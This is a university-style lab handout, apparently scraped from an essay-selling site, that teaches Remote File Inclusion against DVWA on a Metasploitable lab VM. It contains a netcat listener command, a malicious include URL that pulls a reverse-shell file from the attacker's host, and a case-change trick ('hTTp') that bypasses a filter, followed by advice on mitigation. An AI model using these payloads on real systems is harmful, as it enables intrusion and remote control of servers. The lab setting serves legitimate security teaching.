Warning: include(/home/smartonl/royalcustomessays.com/wp-content/advanced-cache.php): failed to open stream: No such file or directory in /home/smartonl/royalcustomessays.com/wp-settings.php on line 95

Warning: include(): Failed opening '/home/smartonl/royalcustomessays.com/wp-content/advanced-cache.php' for inclusion (include_path='.:/opt/alt/php56/usr/share/pear:/opt/alt/php56/usr/share/php') in /home/smartonl/royalcustomessays.com/wp-settings.php on line 95
Remote File Inclusion Vulnerabilities (RFI) – RoyalCustomEssays

Remote File Inclusion Vulnerabilities (RFI)

Supply chain
March 26, 2020
Limiting Human Physical Development Process
March 26, 2020
0

Lab 4: Remote File Inclusion Vulnerabilities (RFI)

Objective
By completion of the lab the students should be able to

Students should be able to identify Remote file inclusion vulnerabilities in a website and exploit it
Students should be able to know how to mitigate such vulnerabilities in a website.

Lab Requirements

  • Desktop or laptop with either Windows or Unix OS
  • Virtual box with Kali Linux
  • Metasploitable virtual machine

Lab Description:
Remote File Inclusion is similar to Local File Inclusion vulnerabilities. This vulnerability can be exploited if the webserver is configured to execute Allow-url and Allow-url-fopen because these functions will allow any file (payload, php shell….) from any machine to be included in the target website. The steps are very similar to the previous local file inclusion lab with one difference is where we have to enable the function that converts the local file inclusion into a remote file inclusion.

Good luck!

Lab Steps:

To enable the remote file inclusion, go to your metasploitable machine and access php settings file using nano (a text editor):
sudo nano /etc/php5/cgi/php.ini
This will start a text editor where you can edit php settings in the web server
This step is necessary to test this vulnerability
Search for the function allow-url (to search use ctrl+w)
You can see that there are two functions set to on: allow_url_fopen & allow_url_include, that means that the local file inclusion vulnerability can be used as a remote file inclusion.
Exit the editor (ctrl+X)
Restart the webserver: sudo /etc/init.d/apache2 restart
Now we will try to access a file in a different server. In this case, the other server is our Kali local server (your own ip address). But if you are pen testing this in a real webserver, then you need to have the file located in a real webserver with ip address or a domain name.
Create a simple php file with any text editor in your kali machine and write the following code in it:

Note: this code will start a reverse shell calling to our machine which means you put your kali ip address.
Save the file as reverse.txt in var/www/html , this will allow metasploitable to access the file in our kali because both are in the same network. Note: we saved the file as .txt because we want it to be executed in metasploitable and not kali.
Start the webserver localhost in your kali linux by running the following command in kali’s terminal:
service apache2 start
access the file you just saved from the web browser in your kali: localhost/reverse.txt
you should be able to see the file you just created.
Configure the security level as low.
Now start listening for connections, from kali terminal type:
nc -vv -l -p 8080
To exploit remote file inclusion, from the file inclusion link in dvwa, replace include.php in the url with the link to the file you created in your kali machine webserver the link should something like this:
http://10.0.2.5/dvwa/vulnerabilities/fi/?page=http://10.0.2.15/reverse.txt?
Note: add the ? at the end of the link to execute the file as a php file
Once you hit enter, you are in! Voila. Check the terminal for the reverse shell connection.
Now we will try the same with the security level medium. It should not work and it will give an error message. There are two options here, they either have patched the vulnerability or they are using a filter.
The filter they might be using would probably be on the http string (because usually the link will not have http in it after the first one)
Replace http with hTTp and hit enter. Viola! This should work. Filters can be bypassed!
Mitigation: First make sure you prevent the remote file inclusion by disabling the two functions allow_url_fopen and allow_url_include in the php.ini file.
Second, to prevent local file inclusion, use static file inclusion. Instead of getting the files using get and post, you should hard code it in the code.
Instead of having the page to be included as parameter, add it as static in the code.
For example (get)
url: index.php?page=news.php
index.php code: include($_GET[‘page.php’]);
Another example (post)
url: index.php
index.php code: include($_POST[‘page.php’]);
In both cases, the user can change the parameter and cause any file to be executed either by changing the url in the get or a proxy in the post.
The safe way to do it is as follows where you hard code whatever file you are including:
Include(‘page.php’);

Lab Assessment
For this lab assessment, follow the instructions to exploit RFI vulnerability in the low and medium security level, and provide me with screen shots of each step and the final reverse shell.
Also, provide a complete report on the website code differences between all three security levels showing statements used to enhance the security of the website to withstand RFI attack.

Rubric (10 Points):
2 marks for screen shots of successful low security level exploitation
2 marks for screen shots of successful medium security level exploitation
2 marks for highlighting and explaining the problem with the low security level code
2 marks for highlighting and explaining the problem with the medium security level code
2 marks for highlighting and explaining the mitigation techniques in the high security level code.

Place Order